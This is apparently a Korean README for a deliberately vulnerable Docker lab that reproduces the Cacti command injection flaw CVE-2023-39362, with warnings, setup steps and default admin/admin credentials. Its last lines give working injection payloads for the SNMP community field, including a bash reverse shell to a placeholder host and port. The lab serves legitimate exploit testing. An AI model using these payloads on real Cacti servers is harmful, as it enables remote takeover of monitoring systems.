
경고: 이것은 Cacti 명령 삽입(CVE-2023-39362) 취약점을 테스트하기 위한 취약한 애플리케이션입니다. 실행 시 책임은 본인에게 있습니다!
이것은 Cacti 취약점 (CVE-2023-39362)에 대한 익스플로잇을 테스트하기 위한 취약 애플리케이션입니다.
이 애플리케이션은 심각한 보안 취약점을 포함하고 있습니다. 실행 시 본인이 책임을 져야 합니다! 백업되고 격리된 환경(예: 최근 스냅샷 및 호스트 전용 네트워킹을 사용하는 VM)을 사용하는 것이 좋습니다. 이 애플리케이션을 인터넷에 노출된 서버에 업로드하지 마십시오. 침해될 수 있습니다.
면책 조항: 본인은 누군가 이 애플리케이션을 사용하는 방식에 대해 책임을 지지 않습니다. 이 애플리케이션의 유일한 목적은 CVE-2023-39362 익스플로잇을 위한 테스트 시나리오이며 악의적으로 사용되어서는 안 됩니다. 이 애플리케이션을 설치하여 서버가 침해된 경우, 이는 제 책임이 아니라 업로드하고 설치한 사람(들)의 책임입니다.
다음은 환경을 설정하는 단계입니다:
docker compose up -d를 실행하여 구성을 시작합니다.admin/admin입니다.admin으로 로그인하세요.guest 사용자를 클릭하세요.guest로 다시 로그인하여 익스플로잇을 시도하세요.컨테이너는 vuln-cacti라고 불립니다.
테스트 SNMP 장치의 호스트 이름은 monitored_snmp_device입니다.
환경을 정리하려면 docker compose down 명령을 사용하세요.
Cacti의 공식 설치 가이드는 여기에서 찾을 수 있습니다.
취약점의 상세한 근본 원인은 원본 보안 자문 또는 제 블로그 게시물에서 확인할 수 있습니다.
(이것은 가능한 하나의 익스플로잇일 뿐입니다.)
public\' ; touch /tmp/m3ssap0 ; \'./tmp 아래에 생성된 파일이 있는지 확인하세요.리버스 셸을 얻으려면 다음과 같은 페이로드를 사용할 수 있습니다.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
이 프로젝트는 Unlicense에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.